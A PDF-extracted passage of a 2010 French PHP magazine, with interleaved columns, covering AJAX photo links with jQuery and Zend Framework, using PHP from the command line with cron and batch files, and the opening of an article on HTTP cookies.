lisons l’aide de vue $this->ajaxLink() qui
génére un lien AJAX. Le prototype de cette
méthode est le suivant :
$this->ajaxLink($label,$url,$options=null,
$params=null);
• $label correspond au texte du lien qui se-
ra affiché ;
• $url est l’adresse du lien ajax à appe-
ler pour charger la photo. Pour nos be-
soins, nous allons spécifier ici une action
ajaxload qui, grâce au paramètre photo
va se charger de récupérer le code html
nécessaire au chargement de la photo.
• $options est un tableau qui contient les
paramètres jQuery à passer. Le paramè-
tre essentiel sera le nom du bloc à mettre
à jour une fois que le contenu html de la
photo à charger sera disponible.
• $params sert à ajouter des attributs à la
balise html <a> du lien qui sera généré.
Enfin, le bloc <div> portant l’identifiant pho-
to doit apparaître dans cette page. Le contenu
initial de celui-ci sera remplacé à l’issu du pre-
mier clic sur un lien photo. Il est nécessaire que
l’attribut id de ce bloc corresponde au nom du
bloc à mettre à jour dans le tableau $options.
Enfin, la déclaration $this->jQuery()
est obligatoirement placée après l’utilisation
des aides de vue jQuery. Elle permet d’in-
clure les données spécifiques à jQuery : la
bibliothèque jQuery elle-même qui par dé-
faut est stockée sur googleapis (cf. remarque
Désactiver le lien meta vers googleapis) et les
4/2010
 AJAX avec JQuery et Zend Framework

Listing 3. La vue index.phtml déclarations spécifiques aux aides de vues

utilisées dans la page.
<html>
<head>
<title>Album photo</title>
L’action PhotoController::
<?php echo $this->headMeta(); ?> ajaxloadAction()
</head> Cette action va se contenter de générer le co-
<body> de HTML qui charge l’image correspondant
<!-- Titre de la page --> au paramètre photo. Le contenu de ce para-
<h1>Mon album photo</h1> mètre est filtré dans un premier temps, afin
d’éviter les problèmes d’injection qui permet-
<!-- Liens AJAX vers les photos -->
traient de faire appel à des fichiers sensibles
<div style="float: left; width: 200<html>
<head> ou d’utiliser notre action comme proxy pour
<title>Album photo</title> des attaques de type XSS. A vous, par la sui-
<?php echo $this->headMeta(); ?> te, de paufiner ce filtrage en fonction de vos
</head>
<body> besoins. Ensuite, le chemin vers la photo est
construit et testé avant d’être passé à la vue.
<!-- Titre de la page -->
<h1>Mon album photo</h1>
La vue ajaxload.phtml
<!-- Liens AJAX vers les photos --> Cette vue, contrairement à la première,
<div style="float: left; width: 200px;"> contient un code HTML minimal : la balise
<?php foreach ($this->photos as $file => $photo) : ?> <img>, qui permet d’afficher la photo, et un
<?php echo $this->ajaxLink($photo,
$this->url(array('action' => 'ajaxload', message d’erreur si la photo n’a pas été trou-
'photo' => $file)), vée. C’est ce code qui sera placé dans le bloc
array('update' => '#photo')); ?><br /> <div id="photo">...</div> du fichier in-
<?php endforeach; ?>
</div>
dex.phtml à chaque clic sur un lien AJAX.
La Figure 4 représente l’application telle
<!-- Zone d'affichage des photos --> qu’elle apparaît une fois terminée. Une fois la
<div id="photo" page chargée, cliquer sur les liens aura pour
style="background: #ccc;
padding: 10px; effet de mettre à jour le bloc gris contenant la
margin-left: 205px; photo et sa description (voir Figure 4).
text-align: center">
<p>Cliquez sur un lien pour afficher une photo.</p>
</div>
Pour aller plus loin
Cette introduction montre le principe d’AJAX
<!-- Génération du contenu jQuery --> avec jQuery et Zend Framework. A ce stade il
<?php echo $this->jQuery(); ?>
est déjà possible de s’amuser. Bien entendu,
</body> quelques connaissances complémentaires de
</html> Javascript et des traitements Json ou XML
sont de très bons atouts pour aller plus loin.
Listing 4. Action PhotoController::ajaxloadAction() dans le fichier PhotoController.php Voici quelques améliorations que nous
... pourrions imaginer pour notre album photo :
public function ajaxloadAction()
{ • l'affichage d'un signal d'attente entre le
$photo = preg_replace('[^a-zA-Zéèàç_-]', '',
$this->getRequest()->getParam('photo'));
moment où le lien est cliqué et la photo
$photo = $this->_getPhotoPath() . '/' . $photo . '.jpg'; chargée ;
$this->view->photo = file_exists($photo) ? $photo : null; • l'affichage automatique d'un repère pour
}
savoir quelle photo est affichée dans la
...
liste des liens ;
Listing 5. Vue ajaxload.phtml • l'ajout d'une liste de vignettes cliquables
et paginées.
<?php if ($this->photo) : $photoLabel = strtr(basename($this->photo,
'.jpg'), '_', ' '); ?>
<img src="<?php echo $this->baseUrl() . '/photos/' . basename($this- Enfin, si vous devez utiliser jQuery régulière-
>photo); ?>" ment, ayez le réflexe de créer vos propres
alt="<?php echo $photoLabel; ?>" /> aides de vue Zend Framework afin de faciliter
<div style="margin-top: 10px; color: #444"><?php echo $photoLabel; ?></
div> et accélérer vos développements.
<?php else : ?>
<p>Unknown request</p>
<?php endif; ?>
GUILLAUME PONÇON
Depuis de nombreuses années, Guillaume Ponçon
se consacre à plein temps aux professionnels qui
• http://www.openstates.com – prestations d’expertise PHP et Zend Framework font le choix de PHP. Il est aujourd’hui spécialiste de
• Best practices PHP 5 – ouvrage français aux éditions Eyrolles Zend Framework. Auteur/conférencier et entrepre-
• Zend Framework, bien développer avec PHP – éditions Eyrolles neur, il propose toute l’année des missions stratégi-
ques d’audit, de formation et de développement.

www.phpsolmag.org 23
 Pratique

CLI :
PHP en ligne de commande
PHP n’est pas qu’un langage de script orienté web.
Il peut s’utiliser en ligne de commande, ce qui
permet de l’utiliser comme un langage de script
classique.

Installation sous Windows

Cet article explique : Ce qu’il faut savoir :
• Comment installer CLI sous Windows et Linux. • Connaître les bases de PHP.
• L’utilisation de PHP en ligne de commande • Avoir des notions de l'utilisation des
et avec des scripts. consoles Linux et Windows.
demment, nous ne passerons pas par un navi-
gateur web pour faire cela mais par un script
Niveau de difficulté exécuté en ligne de commande.
Notez qu’en utilisant CLI, les scripts sont
exécutés jusqu’à ce qu’ils soient terminés,
contrairement à l’utilisation avec Apache, qui
Rendez-vous à l’url http://www.php.net/down-
loads.php et télécharger PHP5.x.x zip (prenez
la dernière version stable, à l’heure de la rédac-
tion de cet article, il s’agit de la 5.3.12) dans
la partie Windows binaries. La Figure 1 mon-
tre la page en question. Ensuite, décompres-
sez l’archive dans le répertoire de votre choix.
Je vous conseille toutefois de créer un réper-
toire à la racine de votre disque dur et d’y dé-
compresser l’archive. Pour l’article, j’ai décom-
pressé l’archive dans c:\cli. L’installation est
maintenant terminée. Afin de vérifier qu’elle
fonctionne correctement, créez un fichier test.

P
HP est habituellement utilisé pour la les stoppe après un certain temps d’exécution php similaire à celui du listing 1 dans c:\cli.
création de sites ou de services web, (30 secondes par défaut). Faites donc très at- Ensuite, ouvrez la console Windows :
mais CLI (Command-Line Interface tention aux boucles infinies qui utiliseraient démarrer → exécuter → taper cmd → ok pour Win-
qui veut dire interface en ligne de commande votre processeur de façon excessive. dows XP et clic droit dans la barre des tâches =>
en français) permet d’utiliser PHP en ligne propriétés => Menu démarrer=> personnaliser
de commande dans la console d’un système Installation et cocher la case «Commande exécuter» pour Win-
d’exploitation. PHP CLI a été publié en ver- Pour pouvoir utiliser PHP CLI, vous devez dows Vista et Windows 7. Vous devriez alors
sion expérimentale avec PHP 4.2.0. Depuis, dans un premier temps installer PHP . Ici, je voir apparaître une fenêtre console similaire
CLI est un outil sûr et très utilisé pour créer vous propose une installation simple, il suffit à celle présente sur la Figure 2 (c:\document
des scripts shell (script système). Il est, notam- de télécharger PHP et ensuite d’utiliser son and setting\rafflin jérémy est le répertoire par
ment, très pratique pour automatiser ses sau- exécutable (vous verrez comment, un peu défaut dans lequel s’ouvre la console, ici il s’agit
vegardes de bases de données, interagir avec plus tard dans l’article). de mon répertoire personnel) .
une aplication web sans utiliser de naviga-
teur et bien d’autres choses. En couplant CLI
à une méthode d’automatisation, vous pour-
rez gagner un temps considérable. Toutes les
possibilités s’offrent alors à vous, vous pouvez
tester si un serveur est disponible automati-
quement, archiver les messages d’un forum
quotidiennement ou encore archiver vos dif-
férentes versions de scripts afin de pouvoir
éventuellement les restaurer.
Au cours de cet article, nous verrons com-
ment installer PHP CLI sous Windows XP
et Linux (l’installation sous les différentes
distributions est quasiment identique). En-
suite, nous utiliserons un exemple simple,
qui sera detaillé dans la suite de l’article, pour
voir les différentes façons d’utiliser CLI. Evi- Figure 1. Téléchargement du Windows binaries

24 4/2010
 PHP CLI

Exécutez désormais cd .. jusqu’à ce que

vous soyez dans c:\, tapez désormais cd cli. Listing 1. Contenu du fichier test.php
Exécutez maintenant votre script test.php en <?php
tapant php test.php. Vous devriez voir apparaî- echo 'hello world';
tre hello world à l’écran. Si ce n’est pas le cas, ?>

recommencez le processus en vous assurant Listing 2. Contenu du fichier livre.csv

que vous suivez bien les étapes.
PHP et MySQL,Luke Welling,Débutant - intermédiaire
Sécurité PHP 5 et MySQL,D. Seguy et P. Gamache,Débutant-moyen
Installation sous Linux
Pour les utilisateurs qui n’utilisent pas d’en- Listing 3. Contenu du fichier argument.php
vironnement graphique, je vous conseille
#!/cli/php
d’aller voir la documentation de votre distri- <?php
bution (l’installation étant différente pour print _ r($argv);
chaque distribution, je ne vais pas les pré- ?>

senter ici car cela serait trop long). Si vous Listing 4. Contenu du fichier add_livre.php
utilisez un environnement graphique, l’ins-
tallation est similaire à celle sous Windows. #!/cli/php
<?php
Rendez-vous sur la page http://www.php. //on vérifie qu'il y a bien le nombre d'arguments attendus
net/downloads.php et téléchargez la source if($argc != 4) //si le nombre d'arguments est différent de 4
PHP5.x.x (tar.gz) ou PHP5.x.x (tar.bz2) sui- {
echo "Erreur, vous devez fournir au moins 3 arguments au script.\n";
vant vos outils de décompression (prenez la }
dernière version stable, à l’heure de la rédac- else //s'il y a le bon nombre d'arguments
{
tion de cet article il s’agit de la 5.3.1). La Fi- $titre = $argv[1];//on récupère le titre
gure 3 est une capture d’écran de la page en $auteur = $argv[2];//on récupère l'auteur
question. $public=$argv[3];//on récupère le public concerné
$donnees = array($titre,$auteur,$public);/*on les met dans un tableau
Une fois l’archive téléchargée, décompres- pour l'écrire dans le fichier csv*/
sez-la dans le répertoire de votre choix. Pour /*
plus de simplicité, j’ai décompressé l’archive *On ouvre le fichier afin de lire son contenu et ensuite pouvoir le
réinsérer
dans /cli (où CLI est un répertoire créé à la ra- */
cine du disque). Vous obtiendrez alors un dos- if($fichier = @fopen('livre.csv','r'))//on ouvre le fichier en lecture
sier php-5.3.1. Changez son nom en php, ainsi {
$info=array();
si vous changez de version, vous n’aurez pas while(($data=fgetcsv($fichier)) != false)
à modifier tous vos scripts. Votre installation {
est maintenant terminée. Afin de vérifier que $info[]=$data;
}
votre installation fonctionne correctement, fclose($fichier);
créez un fichier test.php similaire à celui du }
Listing 1 dans le répertoire /cli/php-5.3.1. if($fichier = @fopen('livre.csv','w'))
Ouvrez désormais un terminal : Application {
→ Outils système → Terminal (cette manipula- foreach($info as $ligne)//on réinsère les données qui étaient déja
présentes dans le fichier
tion peut être différente suivant votre distri- {
bution). Un terminal similaire à celui présent fputcsv($fichier, $ligne);
sur la figure 4 doit alors s’ouvrir. Exécutez }
fputcsv($fichier, $donnees);//on insère les données qui sont passées
la commande cd /cli/php-5.3.1 afin d’avoir le en arguments au script
bon répertoire courant, puis exécutez votre echo "Vous venez d'ajouter : \n".$titre.' | '.$auteur.' | '.$public."\n";
fichier test.php avec la commande php test. }
}
php. Vous devriez voir hello world apparaître ?>
à l’écran. Si ce n’est pas le cas, recommencez
le processus en vous assurant que vous suivez
bien les étapes.

Simplifier l’appel de script

Dans les tests précédents, nous avons créé
et exécuté nos fichiers de tests dans le ré-
pertoire qui contient l’exécutable PHP.
Cela permet d’exécuter les scripts de façon
simplifiée. En effet, il faut appeler l’exécu-
table présent dans le répertoire CLI pour
exécuter nos scripts. Par exemple, si vous
désirez exécuter un script toto.php présent
dans c:\www sous Windows ou dans /var/
www sous Linux alors que votre répertoire
courant est un répertoire quelconque, vous
devez exécuter : Figure 2. Console Windows

www.phpsolmag.org 25
 Pratique

L’exécution de scripts est alors fastidieuse. Il est

Listing 5. Exemple de l’utilisation de STDIN heureusement possible d’accéder à l’exécutable
#!/cli/php PHP en tapant simplement php dans la console.
<?php Sous Windows, vous devez ajouter le che-
print "Ecrivez quelque chose \n";
min de l’exécutable PHP à la variable Path.
$val = trim(fgets(STDIN));
print "Vous avez écrit $val \n"; La variable Path contient les chemins des em-
?> placements des commandes DOS, ce qui per-
Listing 6. Contenu du fichier modif_livre.php
met d’appeler une commande sans utiliser
son chemin absolu. Pour ajouter le chemin
#!/cli/php à la variable Path, procédez ainsi : clic droit
<?php
/* sur poste de travail → propriétés → onglet avancé →
* On lit le fichier livre.csv et on met en forme dans un tableau bouton variable d’environnement → sélectionnez
*/
if($fichier = @fopen('livre.csv','r'))//on ouvre le fichier en lecture
la variable Path → bouton modifier → et ajoutez
{ le chemin vers l’exécutable PHP précédé par
$info=array(); un point virgule (dans l’article ;c:\cli).
while(($data=fgetcsv($fichier)) != false)
{ Sous Linux, nous allons utiliser le Shebang.
$info[]=$data;//on met les informations dans un tableau Le Shebang est la première ligne d’un script
}
sous Linux, elle doit obligatoirement commen-
fclose($fichier);
} cer par #!, le caractère # doit être en première
/* ligne et en première colonne. Le Shebang per-
*On affiche toutes les informations avec un ID pour que l'utilisateur
choisisse quel livre il souhaite modifier met d’indiquer au shell quel interpréteur doit
*/ être utilisé pour le fichier (l’interpréteur doit
$id=1;//on initialise l'ID à incrémenter être indiqué en chemin absolu). Dans l’exem-
echo "\nListe des livres présents dans le fichier : \n\n\n";
echo " Nom du livre | Nom auteur | public visé \n\n"; ple de l’article, la première ligne sera donc #!/
foreach($info as $ligne)//On liste toutes les infos qui étaient dans le fichier cli/php. En écrivant cette ligne au début de cha-
{
echo "$id : ".$ligne[0]." | ".$ligne[1].' | '.$ligne[2]."\n";
cun de vos scripts, vous n’aurez plus qu’à taper
$id++; php /var/www/toto.php pour exécuter toto.php.
}
echo "Entrez l'ID du livre que vous souhaitez modifier : \n";
$val=(int)trim(fgets(STDIN));//on récupère l'id au format entier Application exemple
if($val==0||$val>($id-1))//on vérifie que l'id est compris entre 1 et le nombre Maintenant que vous savez comment instal-
de livres ler CLI et exécuter des scripts PHP en ligne de
{
echo "ID invalide \n"; commande, nous allons voir comment créer des
} scripts pouvant prendre des arguments ou utili-
else //ici on propose de modifier les données du livre
{
sant le terminal comme entrée d’informations.
echo "Entrez le nouveau nom du livre (qui remplacera '".$info[$val- L’application qui va être utilisée pour
1][0]."'): \n"; l’exemple est un stockage d’informations via fi-
$nom _ livre=trim(fgets(STDIN));
echo "Entrez le nouveau nom d'auteur (qui remplacera '".$info[$val-1][1]."'): chier CSV. CSV est un format de fichier ou les
\n"; données sont différenciées à l’aide d’un sépara-
$nom _ auteur=trim(fgets(STDIN));
echo "Entrez le public concerné (qui remplacera '".$info[$val-1][2]."'): \n";
teur, en général une virgule (si vous connaissez
$public=trim(fgets(STDIN)); mal ce format, vous pouvez vous renseigner
$donnees = array($nom _ livre,$nom _ auteur,$public);/*on met les données sur la page internet http://fr.wikipedia.org/wiki/
dans un tableau pour les écrire dans le fichier csv*/
/* Comma-separated_values). Le Listing 2 vous
*On insère les données dans le fichier avec les nouvelles données présente le fichier livre.csv qui sera utilisé dans
*/ l’application exemple. Les différentes infor-
if($fichier = @fopen('livre.csv','w'))
{ mations correspondent au schéma : titre du
foreach($info as $ligne)//On liste toutes les infos qui étaient dans livre,auteur,public visé. Évidemment, ces in-
le fichier
{
formations ne sont pas suffisantes pour réper-
if($id==$val) torier un livre mais cela suffira pour présenter
{ correctement l’utilisation de PHP avec CLI.
fputcsv($fichier, $donnees);
} CLI étant plus utilisé sous Linux que sous
else Windows, j’exécuterai les scripts sous Linux
{
pour la suite de l’article. Les exemples fonction-
fputcsv($fichier, $ligne);
} nent également sous Windows, seuls leurs ap-
$id++; pels diffèrent (voir les sections précédentes).
}
}
fclose($fichier); Récupérer les arguments
}
echo "Modifications enregistrées. \n"; d’un script shell
?> La plupart des commandes shell prennent des
arguments, CLI permet de faire la même chose
avec des scripts PHP. Créez un fichier argument.
• Sous Windows – c:\cli\php c:\www\toto. • Sous Linux – /cli/php /var/www/toto.php php contenant le code présent dans le Listing 3.
php (n’oubliez pas l’espace entre c:\cli\ (n’oubliez pas l’espace entre /cli/php et La variable $argv est un tableau créé par PHP
php et c:\www\toto.php). /var/www/toto.php). qui contient les arguments passés au script.

26 4/2010
 PHP CLI

Figure 3. Téléchargement de la source PHP Figure 4. Terminal Linux

J’ai créé ce fichier dans mon répertoire cou-

rant, ce qui me permet de l’exécuter avec la
commande php argument.php. Exécutez main-
tenant ce script avec des arguments, par exem-
ple : php argument.php toto tata 'argument
4' argument 5. Vous devriez obtenir quelque
chose de similaire à la figure 4. En observant ce
résultat vous pouvez remarquer que le premier
argument du script est le nom du script lui-mê-
me. Les différents arguments doivent être sépa-
rés par des espaces, donc si vous souhaitez pas-
ser des arguments qui contiennent des espaces,
vous devez les mettre entre guillemets. Ainsi
le troisième argument du script sera contenu
dans $argv[3] (ici, la valeur sera tata).
Une autre variable est également disponi-
ble, il s’agit de $argc qui contient le nombre
d’arguments passés au script.
Reprenons notre application pour créer un
script plus concret. Nous allons créer un script
permettant d’ajouter un livre à notre fichier
CSV. Ce script prendra comme argument le
titre du livre, le nom de l’auteur et le public
visé. Ce script doit donc compter quatre argu-
ments (nom du script compris). Le listing 4 est
le script en question. Il contient en première
partie un test qui permet de vérifier si l’on
passe le bon nombre d’arguments au script.
La seconde partie récupère les paramètres du
script et les insère dans un tableau. Vient en-
suite la lecture du fichier livre.csv pour mettre
son contenu dans le tableau $info afin de pou-
voir le réécrire par la suite. La dernière partie
du script ouvre le fichier livre.csv en écriture, y
insère le contenu qui était déjà dans le fichier
avant l’exécution du script, puis insère les don-
nées fournies en paramètre au script. Notez
que \n permet d’effectuer une mise à la ligne.
Vous pouvez désormais ajouter un livre au
fichier livre.csv en exécutant le script avec
trois arguments (exemple : php add_livre.
php titre du livre auteur du livre
public visé).
Figure 5. Résultat du script argument.php
qui permet de supprimer les espaces inutiles
en début et en fin de chaîne de caractères.
Afin de mettre en avant les possibilités
qu’offre STDIN, nous allons étudier le script
modif_livre.php présent dans le listing 6.
La première partie permet de lire les données
présentes dans le fichier et de les insérer dans
un tableau. Cela permettra de les traiter par la
suite. Ensuite, le script affiche les données pré-
sentes dans le tableau, avec une information
supplémentaire, qui est un ID permettant
à l’utilisateur de choisir le livre à modifier. Une
fois que l’utilisateur a saisi un ID, il peut modi-
fier une par une chaque information du livre
qu’il souhaite modifier. Pour finir, le script en-
registre toutes les informations dans le fichier.
La figure 6 est une exécution de ce script.
Automatisation des taches
Maintenant que vous savez créer des scripts
système grâce à PHP, vous allez voir comment
automatiser l’exécution de ceux-ci. Pour cette
partie, vous devez avoir effectué les instruc-
tions permettant de simplifier l’appel des
scripts, c’est-à-dire que vous devez pouvoir exé-
cuter vos scripts en tapant php monScript.php.
Sous Windows
Sous Windows, vous devez dans un premier
temps créer un fichier Batch qui permet de lan-
cer une ou plusieurs commandes DOS en l’exé-
cutant. Une fois les actions effectuées la console
se ferme. Ce type de fichier contient une ins-
truction par ligne et son extension est ‘.bat’.
Un exemple valant mieux qu’un long discours,
nous allons modifier le script test.php qui est pré-
senté en début d’article en y ajoutant une bou-
cle infinie. Ainsi vous pourrez voir l’exécution
de votre script de test car si l’on n’ajoute pas de
boucle infinie, la console se fermera après l’exé-
cution du script et vous n’aurez pas le temps de
voir son exécution. Votre script test.php doit dé-
sormais ressembler à celui du Listing 7.
Créez un fichier texte et renommez-le en lan-
cerTest.bat. Modifiez son contenu (clic droit sur
le fichier puis modifier) afin d’y insérer la com-
mande permettant d’exécuter le script test.php
(normalement php c:\cli\test.php). Maintenant
que votre fichier batch est créé, exécutez-le en
double cliquant dessus. Vous devriez voir appa-
raître une console similaire à celle de la Figure 7.
Pour stopper le script infini, faites ctrl + c.
Maintenant que nous avons créé de quoi

Utilisation de l’entrée standard

STDIN
STDIN est l’entrée standard, elle permet d’in-
teragir avec l’utilisateur. Le listing 5 montre
comment se servir de STDIN en récupérant
ce que l’utilisateur entre au clavier et l’affiche.
Lorsque le script arrive à la ligne contenant
$val = trim(fgets(STDIN)), le script s’arrête
jusqu’à ce que l’utilisateur appuie sur la touche
ENTREE. Ensuite, le script reprend. Trim() Figure 6. Exemple d'exécution du script modif_livre.php

www.phpsolmag.org 27
 Pratique

• (6) uniquement pour les fichiers crontab

Listing 7. Contenu du fichier test.php du système dans /etc/cron.d,
<?php • (7) commande à effectuer .
echo 'hello world';
while(true);//permet de laisser la console ouverte
Il existe également des caractères spéciaux :
?>
• * : s'il est utilisé dans l'un des cinq pre-
Listing 8. Script test.php permettant de créer un repertoire miers champs, indique que la comman-
de doit être effectuée tout le temps,
#!/cli/php
<?php
• / : permet de spécifier une répétition,
If(!fi le _ exists ('titi')) • - : permet de définir une plage,
{ • , : permet de définir plusieurs valeurs.
mkdir('titi');
}
?> Voici une liste de commandes bash permet-
tant de gérer vos fichiers crontab :

• crontab -l permet de lister toutes les ac-

tions crontab de votre utilisateur.
• crontab -u toto -l permet à l’administra-
teur de lister toutes les actions crontab
de l’utilisateur toto.
• crontab -r permet de supprimer votre fi-
Figure 7. Console ouverte suite à l'exécution du fichier .bat chier crontab.
• crontab -e permet d’éditer votre fichier
exécuter notre script, nous allons automa- le régulier. Cron est disponible sur toutes les crontab. Cela ouvrira l’éditeur de tex-
tiser l’appel de ce script. Pour cela ouvrez le distributions Unix/Linux. Je ne vais pas vous te standard vi. Si vous ne savez pas uti-
planificateur de tâches Windows (Panneau détailler Cron à 100% car cela serait une re- liser vi, rendez-vous à l’adresse http://
de configuration → Tâches planifiées). Une fois copie de la documentation mais je vais expli- doc.fedora-fr.org/wiki/Utilisation_ de_
le planificateur ouvert, cliquez sur création quer les bases permettant d’automatiser l’ap- vi#Commandes_diverses .
d’une tâche planifiée, une fenêtre s’ouvre pel de scripts (pour plus de renseignements
alors. Cliquez sur suivant, vous voyez alors les je vous conseille : http://doc.fedora-fr.org/wiki/ Maintenant que nous avons toutes les clés en
exécutables pré-enregistrés de votre système. CRON_:_Configuration_de_t%C3%A2ches_ main, prenons comme exemple un script test.
Cliquez sur Parcourir et sélectionnez votre fi- automatis%C3%A9es ). Pour une utilisation op- php qui crée un dossier dans votre répertoire
chier lancerTest.bat. Vous pouvez alors choi- timale, vous devez être connecté en tant qu’ad- personnel (/root). Le listing 8 contient le code
sir la fréquence d’exécution de votre script. ministrateur du système (root en général). permettant de faire cela. N’oubliez surtout
Choisissez maintenant pour quel utilisateur Les fichiers au format Crontab sont utili- pas le shebang qui permet d’indiquer quel in-
doit s’effectuer la tâche puis cliquez sur sui- sés pour configurer l’appel de scripts. Les fi- terpréteur doit être utilisé.
vant. Vous pouvez terminer la planification chiers de ce format sont constitués de sept Maintenant que notre script est créé, nous al-
de votre tâche ou ouvrir le planificateur champs paramétrables : minute(1) heure(2) lons l’appeler toutes les minutes (évidemment
avancé. Celui-ci permet de paramétrer l’exé- jour(mois)(3) mois(4) jour(semaine)(5) faire cela n’a strictement aucun intérêt, mais cela
cution de façon plus précise, par exemple en utilisateur(6) commande(7) . permet de tester crontab). Editez votre fichier
l’exécutant par intervalle régulier ou encore crontab (tapez crontab -l dans votre terminal)
en répétant la tâche toutes les X minutes. Je • (1) valeur comprise entre 0 et 59, et inserez y */1 * * * * * /chemin_du_fichier/test.php.
vous laisse découvrir le planificateur avancé, • (2) valeur comprise entre 0 et 23, Pour quitter le fichier ouvert avec vi, faites echap
celui-ci permet de nombreux réglages, je vous • (3) valeur comprise entre 1 et 31, → :wq → entrer. Patientez maintenant une minute
conseille donc d’étudier ces possibilités. • (4) valeur comprise entre 1 et 12, et ouvrez votre répertoire personnel (/root), vous
• (5) valeur comprise entre 0 et 7 (Dimanche devriez alors voir aparaître le répertoir titi.
Sous Linux étant le 0 ou le 7) ou alors les abréviations
Sous Linux, il existe un service appelé Cron correspondant aux jours de la semaine en Conclusion
permettant d’exécuter des tâches à interval- Anglais: sun,mon,tue,wed,thur,fri,sat, Vous avez désormais toutes les informations
dont vous avez besoin pour créer des applications
en ligne de commande et automatiser différentes
Sur Internet taches récurrentes. Cela vous facilitera la vie pour
• http://www.php.net/downloads.php – Page de téléchargement de PHP, effectuer diverses tâches telles que la sauvegarde
• http://www.linux-kheops.com/doc/man/manfr/man-html-0.9/man5/crontab.5.html – Petit de bases de données, la sauvegarde de fichiers, la
tutoriel sur crontab, vérification de la disponibilité d’un serveur …
• http://www.hotline-pc.org/batch.htm – Article plutôt complet sur les fichiers Batch (.bat
compris),
• http://fr.wikipédia.org/wiki/Comma-separated_values – Page Wikipedia décrivant le fonc- JÉRÉMY RAFFLIN
tionnement de CSV, L’auteur est étudiant en première année de mas-
• http://php.net/manual/fr/features.commandline.php – Page du manuel PHP concernant CLI, ter. Il est autodidacte en PHP depuis plus de trois
• http://doc.fedora-fr.org/wiki/CRON_:_Configuration_de_t%C3%A2ches_automatis%C3%A9es ans et s’intéresse particulièrement à la sécurité
– Page de la documentation de Cron,
• http://doc.fedora-fr.org/wiki/Utilisation_de_vi#Commandes_diverses – Page Wikipedia ex- et à la création d’applications multi-utilisateurs,
pliquant comment utiliser vi. notamment les jeux vidéo sur navigateur. Pour
me contacter : [email protected]

28 4/2010

Manipuler
les cookies avec PHP
Les cookies sont utilisés par un grand nombre d’applications
et de sites web pour stocker les préférences d’un utilisateur,
pour assurer un suivi de session ou pour pister l’utilisateur.
Dans cet article vous étudierez la transmission et la
manipulation de cookies HTTP avec PHP.
Cet article explique :
• Ce que sont les cookies.
• Comment les cookies sont transmis dans le
protocole HTTP.
• Comment envoyer et recevoir des cookies
avec PHP.
Niveau de difficulté
L
e suivi de session dans le cadre d’un
panier de commande, la naviga-
tion dans une application web avec
authentification, l’affichage personnalisé
d’une page web (langue, style) et le pistage
d’un internaute, ne peuvent fonctionner que
si le serveur reconnaît l’internaute, ou reçoit
les préférences de l’internaute lorsque celui-
ci lui demande une URL.
Les clients (navigateurs) et les serveurs web
communiquent par le biais du protocole de
transport HTTP (HyperText Transfer Pro-
tocol). Aucune information n’est conservée
entre deux connexions. Lorsque le serveur
reçoit une demande de ressource, les seules
informations dont il dispose sont l’adresse IP
qui a émis la requête, et la requête HTTP el-
le-même (ressource demandée, informations
sur le navigateur, et éventuellement données
et méta-informations sur ces données). L’a-
dresse IP ne permet pas d’identifier un uti-
lisateur unique car plusieurs clients peuvent
partager une même adresse IP (proxy, trans-
lation d’adresse). De plus un ordinateur peut
changer d’adresse IP entre deux visites à un
site web, voire même au cours d’une même
navigation (DHCP). Le seul moyen pour un
serveur de reconnaître un internaute est que
www.phpsolmag.org
Ce qu’il faut savoir :
• Vous devez connaître les bases du langage
PHP.
le navigateur transmette une information
dans la requête HTTP. Ceci peut être réali-
sé par divers procédés : placer un paramètre
dans l’URL, transmettre l’information par le
biais d’un formulaire HTML, ou en utilisant
un cookie. La dernière solution est la plus
simple à mettre en place, la plus efficace et la
plus sûre.
Vous allez dans un premier temps étudier le
principe général des cookies et de leur trans-
mission entre un client et un serveur HTTP,
vous verrez ensuite comment créer un cookie
avec PHP et comment l’utiliser dans une ap-
plication web.
Principe
Les cookies permettent à une application
web d’enregistrer des informations de petite
taille sur le disque dur de l’internaute. Lors
des connexions suivantes du client à l’ap-
plication, ces informations sont transmises
automatiquement par son navigateur. Le coo-
kie est une chaîne de caractères composée de
deux parties : un nom et une valeur, séparés
par le caractère égal.
Par exemple, si un internaute choisit la
version anglaise d’un site bilingue, le ser-
veur lui envoie la page anglaise et un cookie
langue=en pour stocker cette préférence de
langue. Lorsque l’internaute demande de
nouvelles pages au serveur, il transmet en
même temps automatiquement le cookie
indiquant la langue souhaitée, le serveur le
reçoit et retourne la page en version anglai-
Cookies
se. Les cookies qui stockent les préférences
d’un internaute sont généralement persis-
tants, c’est-à-dire qu’ils ne sont pas effacés
lorsque l’utilisateur ferme son navigateur
ou éteint son ordinateur. Le cookie sera
transmis lors de toutes les connexions futu-
res vers le site web, et ce jusqu’à ce qu’il soit
détruit (date d’expiration atteinte ou sup-
pression manuelle du cookie par l’utilisa-
teur). Pendant toute la durée de validité du
cookie, l’utilisateur obtiendra donc directe-
ment les pages anglaises du site. La Figure 1
montre un exemple de cookie de langue af-
fiché dans le gestionnaire de cookies de Fire-
fox. Le cookie a été placé par le site web fic-
tif monSiteWeb.fr, il est valide jusqu’au 1er
janvier 2011.
Dans le cadre d’un panier de comman-
de, le cookie est un jeton de session. Lors-
que l’utilisateur débute sa navigation, le
serveur génère un identifiant unique aléa-
toire et l’envoie au navigateur, par exemple
sessid=f7db4156ea79df. Le contenu du
panier de commande est stocké sur le dis-
que dur du serveur, dans une base de don-
nées ou dans un fichier de session. Lors
de toute demande, le navigateur retourne
l’identifiant de session, ceci permet au ser-
veur de le reconnaître et de mettre à jour
le bon panier de commande. Généralement
ces cookies ne sont pas persistants, ils sont
détruits lorsque l’internaute quitte le navi-
gateur.
Les cookies sont parfois utilisés pour pis-
ter un internaute. Le suivi peut être réalisé
sur un domaine ou un site unique afin de
connaître ses habitudes de navigation, ou les
produits du site qui l’intéressent. Lors de la
première visite de l’internaute, le serveur
génère un identifiant unique. A chaque fois
que l’internaute demande une page web, il
retourne le cookie. Le serveur stocke dans un
fichier de log, ou dans une base de données,
29
 Pratique

l’identifiant transmis par cookie, l’heure de

la demande, la page demandée, les produits
concernés. Généralement les profils stockés
sont anonymes, c’est-à-dire qu’ils sont liés
uniquement au cookie, sauf si l’utilisateur
doit s’authentifier pour entrer dans le site, ou
s’il fournit des informations personnelles. Un
profil anonyme est lié à un navigateur et un
ordinateur. Il suffit que l’internaute efface
son cookie ou utilise un autre navigateur ou
un autre ordinateur, pour qu’il ne soit pas re-
connu par le serveur.
